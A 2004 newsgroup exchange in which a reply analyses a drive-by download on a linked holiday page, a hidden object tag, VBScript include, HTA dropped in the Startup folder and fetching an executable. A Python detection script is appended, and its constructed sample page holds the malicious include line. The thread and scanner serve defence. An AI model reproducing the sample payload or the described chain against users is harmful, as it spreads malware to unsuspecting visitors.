On 2004-12-30, Dr. J <nobody@[EMAIL PROTECTED] wrote:
> Folks, in its regular scan of my computer, my anti-virus program detected
> virus "bloodhound.exploit.21" on this webpage. Do yourself a favor and run
> your anti-virus program if you visited this site.
>
> Shame on you paddy
>
>
> <joshz@[EMAIL PROTECTED] wrote in message
> news:i4yAd.609046$nl.394505@[EMAIL PROTECTED]
>> Santa Claus like you have never seen him before, this is a must see for
>> everyone http://paddy.home.comcast.net/
I believe that bloodhound.exploit.21 is a fairly generic term for an attempt
to load something without your knowledge. Hopefully it caught the hta
file in your startup group (before it ran and downloaded the xp.exe file).

When it was up ...

There is nothing much here. Just a picture. Then 214 blank lines.
Then ... an [object] tag running:
JavaScript to write out an inclusion (document.write)
of the VBScript file http://paddy.home.comcast.net/writehta.txt

Once that is included on the page, it creates a file with text
(VBScript). That file is an ADODB.Recordset (filled with the VBScript
commands to get the file http://paddy.home.comcast.net/xp.exe and
save it to
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\OfficeOSA.exe)

The ADODB.Recordset (with the commands to get xp.exe) is then written out
to C:\Documents and Settings\All Users\Start Menu\Programs\Startup\MicrosoftOffice.hta

So it looks like on the next boot, the MicrosoftOffice.hta
is run to get the xp.exe file and save it to OfficeOSA.exe, and on
the next boot, that is run (being in the startup group).

Bad paddy ...
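As an added illustration, not code from the thread, here is a small Python checker for a saved copy of a page that looks for the traits the reply above describes: a long run of blank lines hiding content, an object tag carrying script, a document.write that splices in a script from another host (a non-.js file such as writehta.txt), and any VBScript. The sample page, the clean page and the thresholds are constructed for this example.

```python
import re
from typing import List

# Thresholds and patterns are my own choices for this example, not from the post.
BLANK_RUN_THRESHOLD = 100      # the page in the thread used 214 blank lines
OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
REMOTE_INCLUDE = re.compile(   # document.write(...'<script ... src=http://...'...)
    r"document\.write\s*\(.*?<script[^>]*src\s*=\s*['\"]?(https?://[^'\"\s>]+)",
    re.IGNORECASE | re.DOTALL)
VBS_LANG = re.compile(r"language\s*=\s*['\"]?vbscript", re.IGNORECASE)

def scan_page(html: str) -> List[str]:
    """Return one finding per trait of the chain described in the post."""
    findings: List[str] = []
    # 1. Padding: a long run of blank lines pushes the active content off-screen.
    runs = [m.count("\n") - 1 for m in re.findall(r"\n(?:[ \t]*\n)+", html)]
    longest = max(runs, default=0)
    if longest >= BLANK_RUN_THRESHOLD:
        findings.append(f"padding: {longest} consecutive blank lines")
    # 2. <object> tags whose attributes carry script or point off-site.
    for tag in OBJECT_TAG.findall(html):
        if re.search(r"javascript:|https?://", tag, re.IGNORECASE):
            findings.append("object tag with script/remote content: " + tag[:60])
    # 3. document.write() that splices in a script fetched from another host.
    for url in REMOTE_INCLUDE.findall(html):
        note = "remote script include via document.write: " + url
        if not url.lower().endswith(".js"):
            note += " (non-.js extension)"   # e.g. the writehta.txt include
        findings.append(note)
    # 4. VBScript at all: only IE runs it, and it can reach ActiveX objects such as ADODB.
    if VBS_LANG.search(html):
        findings.append("vbscript language attribute present")
    return findings

# Constructed sample modelled on the post's description (not the real page).
SAMPLE_PAGE = (
    "<html><body>\n<img src='santa.jpg'>\n" + "\n" * 214 +
    "<object data=\"javascript:document.write('<script language=vbscript "
    "src=http://paddy.home.comcast.net/writehta.txt></script>')\"></object>\n"
    "</body></html>\n")
# Constructed benign page: picture and text only.
CLEAN_PAGE = "<html><body>\n<img src='santa.jpg'>\n<p>Merry Christmas</p>\n</body></html>\n"

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```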